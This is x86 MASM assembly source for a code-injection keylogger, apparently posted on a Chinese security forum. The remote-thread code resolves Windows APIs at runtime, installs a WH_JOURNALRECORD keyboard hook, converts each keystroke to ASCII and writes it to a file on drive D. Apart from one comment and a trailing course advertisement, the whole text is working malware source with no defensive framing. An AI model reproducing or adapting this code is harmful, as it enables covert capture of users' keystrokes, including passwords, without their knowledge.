REMOTE_CODE_START equ this byte
_lpLoadLibrary dd ?
_lpGetProcAddress dd ?
_lpGetModuleHandle dd ?
_lpCallNextHookEx dd ?
_lpGetKeyboardState dd ?
_lpGetKeyState dd ?
_lpToAscii dd ?
_lpUnhookWindowsHookEx dd ?
_lpSetWindowsHookEx dd ?
_lpMessageBox dd ?
_lpCreateFile dd ?
_lpCloseHandle dd ?
_lpGetCurrentProcess dd ?
_lpWaitForSingleObject dd ?
_lpWriteFile dd ?
_hInstance dd ?
_hHook dd ?
_hFile dd ?
_lphFile dd ?
_szCallNextHookEx db 'CallNextHookEx',0
_szGetKeyboardState db 'GetKeyboardState',0
_szGetKeyState db 'GetKeyState',0
_szToAscii db 'ToAscii',0
_szUnhookWindowsHookEx db 'UnhookWindowsHookEx',0
_szSetWindowsHookEx db 'SetWindowsHookExW',0
_szMessageBox db 'MessageBoxA',0,0
_szCreateFile db 'CreateFileA',0
_szCloseHandle db 'CloseHandle',0
_szGetCurrentProcess db 'GetCurrentProcess',0
_szWaitForSingleObject db 'WaitForSingleObject',0
_szWriteFile db 'WriteFile',0,0
_szDllKernel32 db 'kernel32.dll',0
_szDllUser32 db 'user32.dll',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RemoteThread proc uses ebx esi edi lParam
local @hModule
local @hModule2
call @F
@@:
pop ebx
sub ebx,offset @B
;*********************************************************************
push NULL
call [ebx + _lpGetModuleHandle]
mov [ebx + _hInstance],eax
lea eax,[ebx + offset _szDllUser32]
push eax
call [ebx + _lpGetModuleHandle]
mov @hModule,eax
lea eax,[ebx + offset _szDllKernel32]
push eax
call [ebx + _lpGetModuleHandle]
mov @hModule2,eax
;*********************************************************************
lea esi,[ebx + offset _szCallNextHookEx]
lea edi,[ebx + offset _lpCallNextHookEx]
.while TRUE
push esi
push @hModule
call [ebx + _lpGetProcAddress]
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if !byte ptr [esi]
.endw
lea esi,[ebx + offset _szCreateFile]
lea edi,[ebx + offset _lpCreateFile]
.while TRUE
push esi
push @hModule2
call [ebx + _lpGetProcAddress]
mov [edi],eax
add edi,4
@@:
lodsb
or al,al
jnz @B
.break .if !byte ptr [esi]
.endw
call _ProcMain
ret
_RemoteThread endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_ProcMain proc uses ebx edi esi
local @hHandle
local @szFileName[32]:byte
push edi
lea edi,@szFileName
mov al,'d'
stosb
mov al,':'
stosb
mov al,'\'
stosb
mov al,'d'
stosb
mov al,'.'
stosb
mov al,'t'
stosb
mov al,'x'
stosb
mov al,'t'
stosb
mov al,0
stosb
pop edi
call @F
@@:
pop ebx
sub ebx,offset @B
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_ALWAYS
push NULL
push FILE_SHARE_READ
mov eax,GENERIC_READ or GENERIC_WRITE
push eax
lea eax,@szFileName
push eax
call [ebx + _lpCreateFile]
.if eax
mov [ebx + _lphFile],eax
.endif
push NULL
mov eax,dword ptr [ebx + _hInstance]
push eax
mov eax,ebx
add eax,offset ReHook
push eax
push WH_JOURNALRECORD
call [ebx + _lpSetWindowsHookEx]
.if eax
mov [ebx + _hHook],eax
.endif
call [ebx + _lpGetCurrentProcess]
;至少远程线程可以运行到这里!
push INFINITE
push eax
call [ebx + _lpWaitForSingleObject]
ret
_ProcMain endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
ReHook proc _dwCode,_wParam,_lParam
local @szKeyState[256]:byte
local @szAscii[32]:byte
call @F
@@:
pop ebx
sub ebx,offset @B
push _lParam
push _wParam
push _dwCode
mov eax,dword ptr [ebx + _hHook]
push eax
call [ebx + _lpCallNextHookEx]
pushad
.if _dwCode == HC_ACTION
mov edx,_lParam
assume edx:ptr EVENTMSG
.if [edx].message == WM_KEYDOWN
lea eax,@szKeyState
push eax
call [ebx + _lpGetKeyboardState]
push VK_SHIFT
call [ebx + _lpGetKeyState]
mov @szKeyState + VK_SHIFT,al
mov ecx,[edx].paramH
shr ecx,16
push 0
lea eax,@szAscii
push eax
lea eax,@szKeyState
push eax
push ecx
push [edx].paramL
call [ebx + _lpToAscii]
mov byte ptr @szAscii [eax],0
.if @szAscii == 0dh
mov word ptr @szAscii+1,0ah
.endif
push NULL
push NULL
mov eax,32
push eax
lea eax,@szAscii
push eax
mov eax,[ebx + _lphFile]
push eax
call [ebx + _lpWriteFile]
.endif
assume edx:nothing
.endif
mov eax,[ebx + _lphFile]
push eax
call [ebx + _lpCloseHandle]
xor eax,eax
popad
ret
ReHook endp
REMOTE_CODE_END equ this byte
REMOTE_CODE_LENGTH equ offset REMOTE_CODE_END - offset REMOTE_CODE_START
[课程]Linux pwn 探索篇!